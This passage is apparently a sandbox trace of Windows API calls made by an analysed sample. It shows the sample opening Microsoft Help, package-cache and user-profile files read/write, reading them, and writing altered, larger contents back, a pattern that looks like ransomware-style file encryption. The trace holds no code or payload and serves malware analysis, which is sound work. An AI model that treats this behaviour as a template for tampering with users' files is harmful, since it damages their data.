lpBuffer=0x288f948*, lpNumberOfBytesRead=0x331f278*=0xf000, lpOverlapped=0x0) returned 1 [0180.504] ReadFile (in: hFile=0x1dc, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x331f278*=0xf000, lpOverlapped=0x0) returned 1 [0180.523] ReadFile (in: hFile=0x1dc, lpBuffer=0x288f948, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x331f278*=0x2000, lpOverlapped=0x0) returned 1 [0180.536] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x3fe000 [0180.536] ReadFile (in: hFile=0x1dc, lpBuffer=0x25a96d8, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x25a96d8*, lpNumberOfBytesRead=0x331f278*=0x2000, lpOverlapped=0x0) returned 1 [0180.541] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x3fe000 [0180.542] WriteFile (in: hFile=0x1dc, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0x2588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x331f28c*=0x2588, lpOverlapped=0x0) returned 1 [0180.547] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0180.547] WriteFile (in: hFile=0x1dc, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x331f28c*=0xf000, lpOverlapped=0x0) returned 1 [0180.549] WriteFile (in: hFile=0x1dc, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x331f28c*=0xf000, lpOverlapped=0x0) returned 1 [0180.549] WriteFile (in: hFile=0x1dc, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x331f28c*=0x2000, lpOverlapped=0x0) returned 1 [0180.549] CloseHandle (hObject=0x1dc) returned 1 [0180.549] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.GROOVE.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.groove.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0180.550] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0180.550] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x6d4 [0180.550] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0180.550] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.550] ReleaseMutex (hMutex=0x168) returned 1 [0180.550] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.GROOVE.14.1033.hxn", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0180.550] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.GROOVE.14.1033.hxn", cchWideChar=21, lpMultiByteStr=0x1f88bcc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.GROOVE.14.1033.hxn", lpUsedDefaultChar=0x0) returned 21 [0180.550] ReadFile (in: hFile=0x1dc, lpBuffer=0x2663858, nNumberOfBytesToRead=0x6d4, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2663858*, lpNumberOfBytesRead=0x331f2bc*=0x6d4, lpOverlapped=0x0) returned 1 [0180.550] CloseHandle (hObject=0x1dc) returned 1 [0180.550] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.MSTORE.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.mstore.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0180.551] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0180.551] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x6d4 [0180.551] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0180.551] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.551] ReleaseMutex (hMutex=0x168) returned 1 [0180.551] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.MSTORE.14.1033.hxn", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0180.551] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.MSTORE.14.1033.hxn", cchWideChar=21, lpMultiByteStr=0x1f88bcc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.MSTORE.14.1033.hxn", lpUsedDefaultChar=0x0) returned 21 [0180.551] ReadFile (in: hFile=0x1dc, lpBuffer=0x2663858, nNumberOfBytesToRead=0x6d4, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2663858*, lpNumberOfBytesRead=0x331f2bc*=0x6d4, lpOverlapped=0x0) returned 1 [0180.552] CloseHandle (hObject=0x1dc) returned 1 [0180.552] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.VISIO.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0180.552] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0180.552] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x6ce [0180.552] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0180.552] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.552] ReleaseMutex (hMutex=0x168) returned 1 [0180.552] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.VISIO.14.1033.hxn", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0180.552] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.VISIO.14.1033.hxn", cchWideChar=20, lpMultiByteStr=0x1f88bcc, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.VISIO.14.1033.hxn", lpUsedDefaultChar=0x0) returned 20 [0180.553] ReadFile (in: hFile=0x1dc, lpBuffer=0x2663858, nNumberOfBytesToRead=0x6ce, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2663858*, lpNumberOfBytesRead=0x331f2bc*=0x6ce, lpOverlapped=0x0) returned 1 [0180.553] CloseHandle (hObject=0x1dc) returned 1 [0180.553] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.winword.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0180.553] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0180.553] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x6f2 [0180.553] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0180.553] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.554] ReleaseMutex (hMutex=0x168) returned 1 [0180.554] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.WINWORD.DEV.14.1033.hxn", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0180.554] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.WINWORD.DEV.14.1033.hxn", cchWideChar=26, lpMultiByteStr=0x1f8fd5c, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.WINWORD.DEV.14.1033.hxn", lpUsedDefaultChar=0x0) returned 26 [0180.554] ReadFile (in: hFile=0x1dc, lpBuffer=0x2663858, nNumberOfBytesToRead=0x6f2, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2663858*, lpNumberOfBytesRead=0x331f2bc*=0x6f2, lpOverlapped=0x0) returned 1 [0180.554] CloseHandle (hObject=0x1dc) returned 1 [0180.554] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0180.554] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0180.554] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x5886ac [0180.554] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0180.555] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.555] ReleaseMutex (hMutex=0x168) returned 1 [0180.555] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cab1.cab", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0180.555] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cab1.cab", cchWideChar=8, lpMultiByteStr=0x1f7366c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cab1.cab", lpUsedDefaultChar=0x0) returned 8 [0180.555] ReadFile (in: hFile=0x1dc, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x331f278*=0xf000, lpOverlapped=0x0) returned 1 [0180.555] ReadFile (in: hFile=0x1dc, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x331f278*=0xf000, lpOverlapped=0x0) returned 1 [0180.555] ReadFile (in: hFile=0x1dc, lpBuffer=0x288f948, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x331f278*=0x2000, lpOverlapped=0x0) returned 1 [0180.555] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x5866ac [0180.555] ReadFile (in: hFile=0x1dc, lpBuffer=0x25a96d8, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x25a96d8*, lpNumberOfBytesRead=0x331f278*=0x2000, lpOverlapped=0x0) returned 1 [0180.556] CloseHandle (hObject=0x1dc) returned 1 [0180.556] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0180.556] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0180.556] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x1657df [0180.556] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0180.556] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.556] ReleaseMutex (hMutex=0x168) returned 1 [0180.556] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cab1.cab", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0180.557] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cab1.cab", cchWideChar=8, lpMultiByteStr=0x1f7366c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cab1.cab", lpUsedDefaultChar=0x0) returned 8 [0180.557] ReadFile (in: hFile=0x1dc, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x331f278*=0xf000, lpOverlapped=0x0) returned 1 [0180.557] ReadFile (in: hFile=0x1dc, lpBuffer=0x288f948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0180.557] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x1647df [0180.557] ReadFile (in: hFile=0x1dc, lpBuffer=0x1e92278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1e92278*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0180.557] CloseHandle (hObject=0x1dc) returned 1 [0180.557] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0180.557] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0180.557] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0xc8f39 [0180.557] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0180.557] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.558] ReleaseMutex (hMutex=0x168) returned 1 [0180.558] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cab1.cab", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0180.558] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cab1.cab", cchWideChar=8, lpMultiByteStr=0x1f7366c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cab1.cab", lpUsedDefaultChar=0x0) returned 8 [0180.558] ReadFile (in: hFile=0x1dc, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x331f278*=0xf000, lpOverlapped=0x0) returned 1 [0180.558] ReadFile (in: hFile=0x1dc, lpBuffer=0x288f948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0180.558] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0xc7f39 [0180.558] ReadFile (in: hFile=0x1dc, lpBuffer=0x1e92278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1e92278*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0180.558] CloseHandle (hObject=0x1dc) returned 1 [0180.558] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm" (normalized: "c:\\users\\all users\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0180.559] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0180.559] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x886 [0180.559] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0180.559] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.559] ReleaseMutex (hMutex=0x168) returned 1 [0180.559] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="state.rsm", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0180.559] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="state.rsm", cchWideChar=9, lpMultiByteStr=0x1f7366c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="state.rsm", lpUsedDefaultChar=0x0) returned 9 [0180.559] ReadFile (in: hFile=0x1dc, lpBuffer=0x288f968, nNumberOfBytesToRead=0x886, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x288f968*, lpNumberOfBytesRead=0x331f2bc*=0x886, lpOverlapped=0x0) returned 1 [0180.559] CloseHandle (hObject=0x1dc) returned 1 [0180.560] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\FeedsStore.feedsdb-ms" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\feedsstore.feedsdb-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0180.565] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0180.565] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x1a00 [0180.565] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0180.565] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.565] ReleaseMutex (hMutex=0x168) returned 1 [0180.565] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FeedsStore.feedsdb-ms", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0180.566] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FeedsStore.feedsdb-ms", cchWideChar=21, lpMultiByteStr=0x1f88c44, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FeedsStore.feedsdb-ms", lpUsedDefaultChar=0x0) returned 21 [0180.566] ReadFile (in: hFile=0x1f0, lpBuffer=0x25a96d8, nNumberOfBytesToRead=0x1a00, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25a96d8*, lpNumberOfBytesRead=0x331f2bc*=0x1a00, lpOverlapped=0x0) returned 1 [0180.574] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0180.574] WriteFile (in: hFile=0x1f0, lpBuffer=0x25a96d8*, nNumberOfBytesToWrite=0x1f88, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a96d8*, lpNumberOfBytesWritten=0x331f2d0*=0x1f88, lpOverlapped=0x0) returned 1 [0180.574] CloseHandle (hObject=0x1f0) returned 1 [0180.575] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0180.576] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0180.576] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x43 [0180.576] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0180.576] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.576] ReleaseMutex (hMutex=0x168) returned 1 [0180.577] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0180.577] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x1f7362c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="desktop.ini", lpUsedDefaultChar=0x0) returned 11 [0180.577] ReadFile (in: hFile=0x1f0, lpBuffer=0x1fc2188, nNumberOfBytesToRead=0x43, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fc2188*, lpNumberOfBytesRead=0x331f2bc*=0x43, lpOverlapped=0x0) returned 1 [0180.578] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0180.578] WriteFile (in: hFile=0x1f0, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5cb, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x331f2d0*=0x5cb, lpOverlapped=0x0) returned 1 [0180.578] CloseHandle (hObject=0x1f0) returned 1 [0180.579] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\04_Music_played_in_the_last_month.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync 